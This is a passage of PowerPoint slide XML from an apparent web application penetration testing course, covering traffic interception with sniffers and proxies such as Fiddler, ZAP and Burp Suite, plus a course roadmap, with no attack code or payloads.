              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interception tools do more than intercept</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can analyze the traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can inject attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7559675" y="3273425"/>
            <a:ext cx="823913" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47108" name="Straight Connector 4"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8012113" y="2498725"/>
            <a:ext cx="0" cy="2682875"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="med"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="47109" name="Object 1026"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7620000" y="1676400"/>
          <a:ext cx="784225" cy="822325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1069" name="Clip" r:id="rId4" imgW="2501900" imgH="2616200" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="2501900" imgH="26162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0" y="1676400"/>
                        <a:ext cx="784225" cy="822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47110" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="1676400"/>
            <a:ext cx="1295400" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC66"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Mobile Device</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="47111" name="Object 1026"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7620000" y="5181600"/>
          <a:ext cx="784225" cy="822325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1070" name="Clip" r:id="rId6" imgW="2501900" imgH="2616200" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="2501900" imgH="26162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0" y="5181600"/>
                        <a:ext cx="784225" cy="822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47112" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="5715000"/>
            <a:ext cx="1295400" cy="461963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC66"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Web Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Up-Down Arrow Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7693025" y="3298825"/>
            <a:ext cx="612775" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="upDownArrowCallou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a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47114" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3276600"/>
            <a:ext cx="1295400" cy="461963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC66"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Interception Tool</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Setting up Interception Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Interception can be done multiple ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Each requires a different set up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>For sniffers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We capture traffic on the same network as the device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>For interception proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We configure the device to connect to the proxy or interception machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>HTTPS can cause us issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Sniffers can't </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Interception tools MitM the connection so our device has to trust the certificate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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
